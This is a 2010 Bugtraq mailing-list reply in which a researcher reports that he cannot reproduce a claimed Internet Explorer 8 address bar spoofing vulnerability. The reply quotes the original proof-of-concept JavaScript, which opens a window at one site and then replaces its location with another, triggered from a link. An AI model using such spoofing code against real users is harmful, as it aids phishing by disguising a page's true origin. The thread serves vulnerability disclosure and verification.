[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <AANLkTin1-kctg+8rtLcBOadeSvr5EiO+rwK8wwkwufhn@mail.gmail.com>
Date: Mon, 26 Jul 2010 22:00:34 +0530
From: Shreyas Zare <shreyas@...fence.com>
To: info@...uritylab.ir
Cc: bugtraq@...urityfocus.com
Subject: Re: Internet Explorer 8.0 Address Bar Spoofing Vulnerability
cant replicate it on my test setup. is something missing?
Shreyas Zare
Sr. Information Security Researcher
Secfence Technologies
www.secfence.com
On Sat, Jul 24, 2010 at 4:38 PM, <info@...uritylab.ir> wrote:
> Spoof Code:
>
> <script>
> function Spoof() {
> oc=window.open('http://www.securitylab.ir/', '','location=1');
> oc.location.replace('http://www.microsoft.com/');
> }
> </script>
> <p align="center">
> <a href="javascript:void(0);" onClick="Spoof()">Go to the Securitylab.ir</a></p>
>
>
> Discovered by: Pouya Daneshmand
> http://Securitylab.ir/Advisories
>
Powered by blists - more mailing lists